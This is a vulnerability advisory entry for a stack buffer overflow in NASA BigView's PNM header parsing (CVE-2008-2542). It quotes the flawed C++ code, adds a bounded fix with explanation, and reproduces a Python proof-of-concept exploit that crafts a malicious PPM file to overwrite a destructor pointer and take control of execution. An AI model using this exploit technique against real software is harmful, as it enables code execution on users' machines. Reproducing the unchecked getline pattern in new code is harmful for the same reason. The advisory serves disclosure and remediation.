NASA BigView PNM File Handling Stack Overflow Vulnerability

Vulnerability ID: 1115349    Vulnerability type: Buffer overflow
Published: 2008-06-04    Updated: 2008-06-04
CVE ID: CVE-2008-2542    CNNVD ID: CNNVD-200806-093
Platform: Multiple    CVSS score: 6.8
|Source
https://www.exploit-db.com/exploits/31872
https://www.securityfocus.com/bid/29517
https://cxsecurity.com/issue/WLB-2008060031
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200806-093
|Details
BigView is a graphics viewer developed by NASA that can stretch and zoom images to arbitrary sizes on a desktop PC running Linux. BigView contains a stack overflow when parsing a specially crafted PNM input file; an attacker may exploit it to take control of a user's system by inducing the user to process a malicious file. The vulnerable code below is in the file Ppm/ppm.C. The getline() function reads data from the file into a buffer:

/-----------
static void getline(int fin, char* lineBuf, int len)
{
  bool done = false;
  int index = 0;
  lineBuf[index] = '\0';   /* character literal lost in extraction; reconstructed as NUL */
  while (!done) {
    lineBuf[index] = getOneChar(fin);
    if (lineBuf[index] == 10) {
      lineBuf[index] = 0;
      done = true;
    }
    ++index;
  }
  lineBuf[index] = 0;
}
------------/

The function takes the length of the destination buffer as a parameter but never uses it internally. The function above is used in PPM::ppmHeader() to read the PPM file header:

/-----------
PPM::ppmHeader(string filename, PPM::Format* format,
               int* cpp, int* bpc,
               int* sizeX, int* sizeY,
               int* imageOffset)
{
  std::ostringstream err;
  char magic[3], lineBuf[512], junk;
  int res, max;
  ...
  while (junk == '#') {   /* '#' (the PNM comment marker) lost in extraction; reconstructed */
    getline(fin, lineBuf, 512);
    cout << "Comment:" << lineBuf << endl;   /* tail of this statement lost in extraction; reconstructed */
    junk = getOneChar(fin);
  }
------------/

The lineBuf buffer allocated on the stack is 512 bytes. If the PPM header contains a line longer than 512 bytes, a stack overflow is triggered, leading to denial of service or execution of arbitrary instructions.
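As an added, defender-side example that is not part of this advisory or of BigView's source: a bounded replacement for getline() that actually honours its len parameter, and the comment-skipping loop of PPM::ppmHeader() rewritten to reject an oversize comment line instead of overflowing lineBuf. ByteSource, getlineBounded and skipCommentsBounded are names assumed for this example; ByteSource stands in for the file descriptor that getOneChar() reads, and the sample header in main() is constructed.

```cpp
#include <cstddef>
#include <cstdio>
#include <string>
#include <utility>

// Added example, not BigView's code. ByteSource is a hypothetical in-memory
// stand-in for the file descriptor that getOneChar() reads from in Ppm/ppm.C;
// next() returns the next byte, or -1 at end of input.
struct ByteSource {
    std::string data;
    std::size_t pos = 0;
    explicit ByteSource(std::string d) : data(std::move(d)) {}
    int next() {
        if (pos >= data.size()) return -1;
        return static_cast<unsigned char>(data[pos++]);
    }
};

// Bounded replacement for getline(): honours `len`, always leaves room for
// the NUL terminator, and stops at end of input instead of reading forever.
// Bytes that do not fit are consumed and discarded so the caller stays in
// sync with the stream; `truncated` reports that the line was cut short.
// Returns the number of bytes stored, excluding the terminator.
std::size_t getlineBounded(ByteSource& fin, char* lineBuf, std::size_t len, bool& truncated) {
    truncated = false;
    if (len == 0) return 0;
    std::size_t index = 0;
    for (;;) {
        int c = fin.next();
        if (c == -1 || c == '\n') break;
        if (index + 1 < len) {
            lineBuf[index++] = static_cast<char>(c);
        } else {
            truncated = true;  // this byte would have landed past lineBuf[len-1]
        }
    }
    lineBuf[index] = '\0';
    return index;
}

// Hardened form of the comment-skipping loop in PPM::ppmHeader(): `junk`
// holds the byte already read from the stream. A comment line that exceeds
// the 512-byte buffer makes the header invalid (return false) rather than
// being silently truncated, since a mangled header should not be parsed on.
bool skipCommentsBounded(ByteSource& fin, int& junk) {
    char lineBuf[512];
    while (junk == '#') {
        bool truncated = false;
        getlineBounded(fin, lineBuf, sizeof lineBuf, truncated);
        if (truncated) return false;
        junk = fin.next();
    }
    return true;
}

int main() {
    // Constructed sample header: one comment line far longer than lineBuf.
    ByteSource fin("#" + std::string(700, 'A') + "\n300 300\n255\n");
    int junk = fin.next();
    bool ok = skipCommentsBounded(fin, junk);
    std::printf("header %s\n", ok ? "accepted" : "rejected: comment line too long");
    return ok ? 0 : 1;
}
```

The replacement keeps the original's contract (read up to the newline, NUL-terminate) but adds the two checks the original lacks: a capacity check against len before every store, and an end-of-input check so a file without a trailing newline cannot drive the loop off the end of the stack buffer. Draining the rest of an oversize line keeps the stream position consistent for the caller, which then decides whether truncation is acceptable; for a header parser, rejecting the file is the safer choice.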
|Exploit
source: http://www.securityfocus.com/bid/29517/info

NASA Ames Research Center BigView is prone to a remote stack-based buffer-overflow vulnerability because it fails to properly bounds-check user-supplied data before copying it to an insufficiently sized memory buffer.

An attacker can exploit this issue to execute arbitrary code in the context of the application. Successful attacks will compromise the application and underlying computer. Failed exploit attempts will result in a denial of service.

BigView 1.8 is vulnerable; other versions may also be affected. 

/-----------

## BigView exploit
## Alfredo Ortega - Core Security Exploit Writers Team (EWT)
## Works against BigView "browse" revision 1.8 compiled on ubuntu 6.06
## Desktop i386

import struct
w = open("crash.ppm","wb")
w.write("""P3
#CREATOR: The GIMP's PNM Filter Version
1.0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA""")
# This exploit is not trivial, because the function PPM::ppmHeader()
# doesn't return immediately, and we must modify internal variables to
# cause an overwrite of a C++ string destructor executed at the end of the
# function to gain control of EIP
# PS.: Congrats for the Phoenix mars Lander!
for i in range(7):
                w.write(chr(i)*4)
w.write("AA")
w.write(struct.pack("<L",0xaaaaaaaa))
w.write(struct.pack("<L",0xbbbbbbbb))
w.write(struct.pack("<L",0xcccccccc))
w.write(struct.pack("<L",0x08080000))
w.write(struct.pack("<L",0x08080000)*48)

# The address of the destructor is hard-coded. Sorry but this is only a
# PoC!
destination = 0x0805b294 # destructor
value = 0x41414141 #address to jump to
w.write(struct.pack("<L",destination)) # destination

w.write("""
%d 300
255
255
255
255
""" % value)
w.close()

------------/
|Affected products
NASA Ames Research Center BigView 1.8
|References

Source: XF
Name: bigview-getline-bo(42847)
Link: http://xforce.iss.net/xforce/xfdb/42847
Source: BUGTRAQ
Name: 20080604 CORE-2008-0425 - NASA BigView Stack Buffer Overflow
Link: http://www.securityfocus.com/archive/1/archive/1/493112/100/0/threaded
Source: VUPEN
Name: ADV-2008-1745
Link: http://www.frsirt.com/english/advisories/2008/1745/references
Source: MISC
Link: http://www.coresecurity.com/?action=item&id=2304
Source: SREASON
Name: 3924
Link: http://securityreason.com/securityalert/3924
Source: SECUNIA
Name: 30546
Link: http://secunia.com/advisories/30546